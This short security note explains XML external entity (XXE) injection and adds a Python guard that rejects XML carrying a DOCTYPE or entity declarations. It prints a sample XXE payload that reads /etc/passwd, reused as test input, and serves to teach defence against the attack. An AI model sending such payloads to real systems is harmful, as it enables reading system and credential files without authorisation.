XML external entity (XXE) injection

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
Most XML parsers are vulnerable to XXE injection by default.
You need to configure them to be safe.

(Source: the book "Release It!" by Michael Nygard)
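
One way to make a parser safe for untrusted input, shown as an added example (not from the book or the original note): reject any document that declares a DOCTYPE or entities before building a tree from it. Python and its standard-library expat and ElementTree modules are an assumption, as are the names ForbiddenXML and parse_untrusted_xml.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# The document from the note above, used as test input.
PAGE_PAYLOAD = b"""<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""


class ForbiddenXML(ValueError):
    """Untrusted XML contained a construct this service refuses to process."""


def _reject(kind):
    # Build an expat callback that aborts parsing as soon as `kind` is seen.
    def handler(*_args):
        raise ForbiddenXML(f"{kind} is not allowed in untrusted XML")
    return handler


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML only if it carries no DTD and no entity declarations.

    A first expat pass acts as a guard: the DOCTYPE handler fires before any
    entity is defined or resolved, so nothing external is ever fetched.
    The other two handlers are defence in depth.
    """
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject("DOCTYPE declaration")
    guard.EntityDeclHandler = _reject("entity declaration")
    guard.ExternalEntityRefHandler = _reject("external entity reference")
    guard.Parse(data, True)          # raises ForbiddenXML or expat.ExpatError
    return ET.fromstring(data)       # reached only for DTD-free documents


if __name__ == "__main__":
    print(parse_untrusted_xml(b"<foo>hello</foo>").text)
    try:
        parse_untrusted_xml(PAGE_PAYLOAD)
    except ForbiddenXML as exc:
        print("rejected:", exc)
```

Rejecting DTDs outright is the strictest setting; a service that genuinely needs DTDs has to keep them and disable external entity resolution in its parser instead.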